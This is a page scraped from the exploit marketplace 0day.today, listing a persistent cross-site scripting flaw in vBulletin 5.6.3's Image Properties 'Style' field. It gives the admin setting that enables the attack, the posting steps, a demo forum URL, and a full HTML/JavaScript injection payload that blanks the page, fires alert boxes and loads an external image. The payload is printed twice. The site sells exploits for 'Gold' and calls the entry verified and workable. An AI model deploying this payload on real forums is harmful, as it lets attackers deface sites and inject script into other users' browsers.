0day.today - La plus grande base de données de Exploit dans le monde.
![](/img/logo_green.jpg)
Nous utilisons un domaine DOMAIN_LINK
Si vous voulez acheter un exploit ou payer un service vous avez besoins d'Or. Nous ne voulons pas que notre site soit utiliser comme outil de piratage , de sorte que touts types d'actions qui pourrais affecter illegalement d'autres utilisateurs ou sites web ou vous n'avez pas l'autorisation vous serez bannit et votre compte ainsi que vos donnees seront supprimees.
Les administrateur de 0day.today utilises des moyens de contacts officiels. Mefiez-vous des imposteurs!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Lire le [ J'accepte ]
- Lire le [ Envoyer ] Regles
- Visiter le [ faq ] page
- [ Enregistrement ] profil
- Obtenir [ GOLD ]
- Si vous voulez [ vendre ]
- Si vous voulez [ acheter ]
- Si vous vous perdez [ Compte ]
- Une questions [ [email protected] ]
- Connexion
- Page d'enregistrement
- Restauration de compte
- Foire aux questions
- Contactez-nous
- Regle de publication
- Page de contrat
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Vous pouvez nous contacter par:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
vBulletin 5.6.3 Persistent XSS Image Properties Vulnerability
[ 0Day-ID-34885 ]
Titre complet
vBulletin 5.6.3 Persistent XSS Image Properties Vulnerability
[ Highlight ]
Highlight - is paid service, that can help to get more visitors to your material.
Price:
Price:
![](/img/gold.gif)
Date d'ajout
Catégorie
Plateforme
Vérifié
![](/img/check.png)
Prix
gratuit
Risque
![](/img/risk/critlow_3.gif)
Security Risk High
]Rel. releases
Description
Click Image Properties in the Pmchat or Topic on the forum and we can see that field "Style" vulnerable to cross site scripting.
Info d'utilisation
Put xss code in the field and click "post reply". And we have a persistent xss. XSS attack can be use only by the administrator. He will not do this.
Can a user do this? Yes. If the administrator changes the settings.
Settings for change and tests:
Admin CP - Channel Permissions Manager - Edit Registered Users-Can Use HTML - yes. And we can see the rule : "Security Risk: Enabling HTML for untrusted users can expose your site to security risks and exploitation".
We found a vulnerable field and tested how it works if we change the security settings. But there may be(?) other ways to exploit this bug.
Example page with Persistent XSS:
https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum/82-hello
XSS CODE (i like a big code;)):
""><style>body{visibility:hidden;} html{background-color: Black;}</style><div style="position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;"><script>alert("Persistent XSS")</script><script>alert("vBulletin 5.6.3")</script><script>alert("by XSS Maker Vincent ibn Winnie")</script><img src="https://i.gifer.com/Ltvw.gif " style="height: 300px; width: 400px;" alt=".."><br>Cross site scripting is here..;)<br></img><iframe>
Can a user do this? Yes. If the administrator changes the settings.
Settings for change and tests:
Admin CP - Channel Permissions Manager - Edit Registered Users-Can Use HTML - yes. And we can see the rule : "Security Risk: Enabling HTML for untrusted users can expose your site to security risks and exploitation".
We found a vulnerable field and tested how it works if we change the security settings. But there may be(?) other ways to exploit this bug.
Example page with Persistent XSS:
https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum/82-hello
XSS CODE (i like a big code;)):
""><style>body{visibility:hidden;} html{background-color: Black;}</style><div style="position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;"><script>alert("Persistent XSS")</script><script>alert("vBulletin 5.6.3")</script><script>alert("by XSS Maker Vincent ibn Winnie")</script><img src="https://i.gifer.com/Ltvw.gif " style="height: 300px; width: 400px;" alt=".."><br>Cross site scripting is here..;)<br></img><iframe>
Editeur
https://www.vbulletin.com/en/vb5-trial/
Version affectée
5.6.3
Testé sur
Windows 10 Mozilla Firefox and Opera
Prooves Information
Other Information
Abuses
0
Commentaires
0
Vue
2 343
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
gratuit
Open Exploit
You can open this source code for free
You can open this source code for free
![](/img/check_16.png)
Verified by
This material is checked by Administration and absolutely workable.
This material is checked by Administration and absolutely workable.
[ Commentaires: 0 ]
Terms of use of comments:
- Users are forbidden to exchange personal contact details
- Haggle on other sites\projects is forbidden
- Reselling is forbidden
Identifiez-vous ou inscrivez-vous pour laisser un commentaire
Identifiez-vous ou inscrivez-vous pour laisser un commentaire